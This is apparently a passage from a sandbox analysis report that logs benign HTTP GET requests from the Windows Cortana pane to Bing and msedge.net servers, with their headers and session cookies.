  cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=22cef22c&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic HTTP traffic detected: GET /rp/2a5zh0ZIpVSs0HhW1xQBRsZz1Ek.br.js HTTP/1.1
  host: www.bing.com
  accept: */*
  referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
  accept-encoding: gzip, deflate, br
  user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
  cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=22cef22c&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic HTTP traffic detected: GET /rp/4BpQ1bD8vX1mXuJObN-gg9RqkyQ.br.js HTTP/1.1
  host: www.bing.com
  accept: */*
  referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
  accept-encoding: gzip, deflate, br
  user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
  if-modified-since: Mon, 14 Oct 2024 19:38:35 GMT
  if-none-match: 0x8DCEC87CAFC6FD9
  cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=22cef22c&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic HTTP traffic detected: GET /rp/4TaH4o18x54UGQY5mQVwBbXDzpA.br.js HTTP/1.1
  host: www.bing.com
  accept: */*
  referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
  accept-encoding: gzip, deflate, br
  user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
  cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=22cef22c&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic HTTP traffic detected: GET /rp/5qSqWyip_grL-s7BafaqI3Mrk9M.br.js HTTP/1.1
  host: www.bing.com
  accept: */*
  referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
  accept-encoding: gzip, deflate, br
  user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
  if-modified-since: Mon, 14 Oct 2024 19:42:59 GMT
  if-none-match: 0x8DCEC8868ADE5B1
  cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=22cef22c&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic HTTP traffic detected: GET /conf/v2/asgw/fpconfig.min.json?monitorId=asgw HTTP/1.1
  host: fp.msedge.net
  origin: https://www.bing.com
  referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
  accept: */*
  accept-language: en-CH
  accept-encoding: gzip, deflate, br
  user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
Source: global traffic HTTP traffic detected: GET /rp/Cm-j2OJKwOWyiyy_LY0s7IvC7Qc.br.js HTTP/1.1
  host: www.bing.com
  accept: */*
  referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
  accept-encoding: gzip, deflate, br
  user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
  if-modified-since: Tue, 26 Nov 2024 22:00:20 GMT
  if-none-match: 0x8DD0E65B838AF8A
  cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=22cef22c&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic HTTP traffic detected: GET /rp/Cup3Is1bdaUS3C5__G12HeKRFUk.br.js HTTP/1.1
  host: www.bing.com
  accept: */*
  referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
  accept-encoding: gzip, deflate, br
  user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
  cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=22cef22c&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic HTTP traffic detected: GET /rp/EZWKAkzgKyOdhH1NT8zm80mcnH4.br.js HTTP/1.1
  host: www.bing.com
  accept: */*
  referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
  accept-encoding: gzip, deflate, br
  user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
  cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=22cef22c&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic HTTP traffic detected: GET /rp/F-9phXC_0uAqQQFuRafyV39z6Dk.br.js HTTP/1.1
  host: www.bing.com
  accept: */*
  referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
  accept-encoding: gzip, deflate, br
  user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
  if-modified-since: Tue, 11 Feb 2025 05:03:53 GMT
  if-none-match: 0x8DD4A597B271F69
  cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=22cef22c&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic HTTP traffic detected: GET /rp/FBodW3lwNP5Qe6iF-d8dpJdC9lc.br.js HTTP/1.1
  host: www.bing.com
  accept: */*
  referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
  accept-encoding: gzip, deflate, br
  user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
  if-modified-since: Thu, 10 Oct 2024 00:29:28 GMT
  if-none-match: 0x8DCE8C299FB56AD
  cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=22cef22c&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic HTTP traffic detected: GET /rp/HblQIM5IGEhN4CVPKMIjlJHqY14.br.js HTTP/1.1
  host: www.bing.com
  accept: */*
  referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
  accept-encoding: gzip, deflate, br
  user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
  cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=22cef22c&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic HTTP traffic detected: GET /rp/KS4jq8YC9OOOXT_rC7gR0M_1aN8.br.js HTTP/1.1
  host: www.bing.com
  accept: */*
  referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
  accept-encoding: gzip, deflate, br
  user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
  cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=22cef22c&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic HTTP traffic detected: GET /rp/Kw-hqxyqLK6odmI-5H3LHnGRNUU.br.js HTTP/1.1
  host: www.bing.com
  accept: */*
  referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
  accept-encoding: gzip, deflate, br
  user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
  cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=22cef22c&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic HTTP traffic detected: GET /apc/trans.gif?87976b596980857850532fa909f51f1b HTTP/1.1
  host: b-ring.msedge.net
  referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
  accept: image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5
  accept-language: en-CH
  accept-encoding: gzip, deflate, br
  user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
Source: global traffic HTTP traffic detected: GET /rp/MYX7X3OSympejx7iZ4u3Rl1TwRA.br.js HTTP/1.1
  host: www.bing.com
  accept: */*
  referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
  accept-encoding: gzip, deflate, br
  user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
  cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=22cef22c&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic HTTP traffic detected: GET /apc/trans.gif?98758aa62564c1822353726be6083611 HTTP/1.1host: b-ring.msedge.netreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5accept-language: en-CHaccept-encoding: gzip, deflate, bruser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
Source: global traffic HTTP traffic detected: GET /rp/RGSO4sEmvYv8wsttX4XoQuFoMMM.br.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: gzip, deflate, bruser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=22cef22c&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic HTTP traffic detected: GET /rp/VrAE8CZ_PJkn0hgh2rwA1uThjyE.br.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: gzip, deflate, bruser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045if-modified-since: Thu, 10 Oct 2024 00:31:38 GMTif-none-match: 0x8DCE8C2E76B0D4Dcookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=22cef22c&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic HTTP traffic detected: GET /apc/trans.gif?62429672578152eea57f84aafc162f64 HTTP/1.1host: spo-ring.msedge.netreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5accept-language: en-CHaccept-encoding: gzip, deflate, bruser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
Source: global traffic HTTP traffic detected: GET /rp/XKZ41694P7XbcLcfFJwPjCvgy20.br.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: gzip, deflate, bruser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045if-modified-since: Thu, 10 Oct 2024 00:30:29 GMTif-none-match: 0x8DCE8C2BE5C5222cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=22cef22c&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic HTTP traffic detected: GET /apc/trans.gif?456f89d19c3134a687f24503b7eb5933 HTTP/1.1host: spo-ring.msedge.netreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5accept-language: en-CHaccept-encoding: gzip, deflate, bruser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
Source: global traffic HTTP traffic detected: GET /rp/ZnCCscMEmiOFOpkhdhTnOY5dhSY.br.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: gzip, deflate, bruser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=22cef22c&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic HTTP traffic detected: GET /r.gif?MonitorID=asgw&rid=f90d9d78e1ee958148fa709861896dba&w3c=true&prot=https:&v=20190506&DATA=[{%22RequestID%22:%22b-ring.msedge.net%22,%22Object%22:%22trans.gif%22,%22Conn%22:%22cold%22,%22Result%22:668,%22T%22:1},{%22RequestID%22:%22b-ring.msedge.net%22,%22Object%22:%22trans.gif%22,%22Conn%22:%22warm%22,%22Result%22:130,%22T%22:1},{%22RequestID%22:%22spo-ring.msedge.net%22,%22Object%22:%22trans.gif%22,%22Conn%22:%22cold%22,%22Result%22:661,%22T%22:1},{%22RequestID%22:%22spo-ring.msedge.net%22,%22Object%22:%22trans.gif%22,%22Conn%22:%22warm%22,%22Result%22:129,%22T%22:1},{%22RequestID%22:%22t-ring-fdv2.msedge.net%22,%22Object%22:%22trans.gif%22,%22Conn%22:%22cold%22,%22Result%22:-1,%22T%22:1}] HTTP/1.1host: fp.msedge.netorigin: https://www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHaccept-encoding: gzip, deflate, bruser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
Source: global traffic HTTP traffic detected: GET /rp/bdzEveHhW1Yhm9BKZUNXT_TlOPk.br.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: gzip, deflate, bruser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=22cef22c&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic HTTP traffic detected: GET /rp/h2m6AVCpDtS8Ff3ZxuDGx1A2-O8.br.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: gzip, deflate, bruser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045if-modified-since: Thu, 10 Oct 2024 00:33:02 GMTif-none-match: 0x8DCE8C319B7C9BFcookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=22cef22c&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic HTTP traffic detected: GET /rp/ikpPfkLjP14eKCzM16ksiFVp92Y.br.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: gzip, deflate, bruser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045if-modified-since: Thu, 10 Oct 2024 00:32:27 GMTif-none-match: 0x8DCE8C3047DE767cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=22cef22c&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
